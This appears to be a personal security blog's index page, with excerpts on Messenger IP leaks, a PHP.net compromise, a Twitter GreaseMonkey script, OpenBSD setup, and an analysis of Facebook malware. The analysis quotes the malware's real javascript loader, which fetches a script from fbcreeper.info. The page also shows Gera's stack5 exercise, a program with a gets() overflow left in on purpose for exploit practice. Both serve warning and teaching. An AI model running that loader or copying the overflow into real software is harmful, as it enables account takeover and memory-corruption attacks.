It’s common knowledge that Microsoft Windows Live Messenger is one of the most insecure instant messengers out there, since its communication protocol doesn’t use any kind of encryption.
Today, while I was working on my pet honeypot project, I found out that it also leaks users’ public IP addresses when they exchange links during their conversations.
While I was browsing my Twitter timeline today, I saw a tweet by VUPEN security about a possible compromise of PHP.net server(s) and a potential PHP source backdoor.
We are aware of a possible compromise of PHP.NET server(s) and a potential PHP source backdoor. “wiki.php.net” was taken offline
–VUPEN Security
Before I continue, I want to make clear that I don’t have any information regarding the compromise, neither can I state that PHP source code was or wasn’t backdoored, since I have not inspected the code, neither have I reviewed the revision log and the changes committed to PHP source tree. This information is publicly available at http://svn.php.net.
On February the 4th I had a small presentation at Thessaloniki Tech Talk Sessions, on hijacking web sessions and injecting code at the lower layers of a local area network. Here you can find the slides and a little paper I wrote on the topic:
While I was browsing today my timeline, I noticed some re-tweets of people who had annoyingly blinky avatars. I guess Twitter missed the old days, when browsing the web could give you an epileptic seizure. Since people tend to get excited with stupid ideas, I took the time to write a little GreaseMonkey script for Twitter, which substitutes GIF avatars with the Twitter’s default avatar (an egg or something). So now when the blinky pink “Hello, Kitty” apocalypse comes, I’ll be prepared.
You can grab the script from here.
/*
A little GreaseMonkey script for Twitter, which replaces GIF avatars
with the Twitter's default avatar in your timeline.
Karagasidis Dimitris, http://gatoni.gr
*/
// ==UserScript==
// @name         Twitter GIF Avatar Blocker
// @namespace    http://gatoni.gr
// @description  A script which substitutes GIF avatars with the Twitter's default avatar
// @include      http://twitter.com/*
// ==/UserScript==
function eliminate_gifs() {
var avatars = document.getElementsByTagName("img");
for ( var i in avatars ) {
// Check if the image is an avatar in the timeline
if ( avatars[i].className == "user-profile-link" || avatars[i].className == "photo fn" ) {
// Substitute the animated avatar with the Twitter's default avatar
if ( avatars[i].src.substr(-3).toLowerCase() == "gif" ) {
avatars[i].src = "http://a1.twimg.com/sticky/default_profile_images/default_profile_0_normal.png";
};
};
};
};
eliminate_gifs();
setInterval( eliminate_gifs, 3000 );
Spent the day de-obfuscating and analyzing the code of a malware I found on the wall of one of my contacts. It took me quite a few hours, since I de-obfuscated the code manually in a text-editor. At least now I can build a descent code obfuscator on my own. :p
You can read the de-obfuscated and fully documented code here.
This is the URLs distributing the malware:
This is what this malware does:
As of now (22nd February 2011, 23:40 GMT+2), somewhere between 11,000 and 20,000 accounts are infected.
The malware is injected through a javascript code snippet:
javascript: (a = (d = document).createElement("script")).src = "http://fbcreeper.info/StalkerTools.fb";void(d.body.appendChild(a))
Do NOT inject and execute unknown code in your browser address bar. If you happened to use this application/malware, check your pages’ administrators, log-out from your Facebook account, clear browsing history and remove any links left on your wall and your pages.
Going through some lazy days, not working on anything in particular. Waiting for my exam period to end. Spent the day jamming on my guitar, and decided to record some parts of it. So this is the result. 
Few days ago, I registered a free domain name from No-IPâ„¢ Dynamic DNS provider. My router has an embedded dynamic dns client, but for some reason it didn’t update properly the No-IPâ„¢ servers each time it got disconnected, so I had to do it manually. Also it’s not configurable, so I couldn’t set various parameters such as update interval.
I decided to set up ddclient on one of my boxes to solve this problem. I installed it, but I really didn’t feel like reading the whole ddclient.conf file in order to configure it, so I decided to write my own client. It’s not rocket science, you just make requests to No-IPâ„¢ update servers with your credentials, your current ip and the domain name you want to associate with it.
[Update #1/Time Saver: As DbD pointed out in his comment, you can search for package names using pkg_info or the pkg front-end to package management tools.]
As I mentioned in one of my previous posts, I installed OpenBSD, so I’m spending these days configuring it according to my needs.
One of the things that annoyed me, is that the OpenBSD’s default package management system doesn’t have a utility for searching packages. Every time I was about to install a package, I had to search the web or look for it in my preferred mirror’s directory listing. So I decided to write a utility for that -since I like writing my own shit and it was something trivial to do.
So today I decided to install OpenBSD on one of my boxes. It’s been years since the last time I messed with this OS. I intended to use it as a local server and move there most of the services I have distributed on other (virtual and not) machines.
Since I spend most of my time in GNU/Linux terminals, I found OpenBSD terminal pretty annoying -specifically, the fact that some keys (HOME, END, PAGE UP etc)Â for some fucking reason don’t work. I tried to find a workaround by changing terminal types, but the problem persisted. I read somewhere that in graphical terminals this problem does not occur, so I installed Xorg and XFCE, just in case I need to do some longer-than-usual administration tasks which require lots of typing. And indeed, in graphical environment everything worked smooth…
…Until after few minutes later, when I realized that there were some rendering problems. It was like the surface wasn’t redrawn properly. When I clicked on icons or opened windows, my desktop was full of glitches, which were annoying as hell. I have an old ATI Radeon 7500 on that box, by the way.
I noticed that there was a shitload of options for radeon-based cards commented out in my xorg.conf, so I started reading the manual for ATI Radeon video driver which comes with OpenBSD, to find out what they were all about.
The last snippet of code in Gera’s “Warming Up on Stack” series that we have to exploit is this:
/* stack5.c *
* specially crafted to feed your brain by gera */
int main() {
int cookie;
char buf[80];
printf("buf: %08x cookie: %08x\n", &buf, &cookie);
gets(buf);
if (cookie == 0x000a0d00)
printf("you lose!\n");
}
Our task is to make this piece of code print “you win!” to the standard output.
Spoiler Alert: If you want to solve this exercise on your own, you should stop reading here.
Powered by the ZenLite Theme
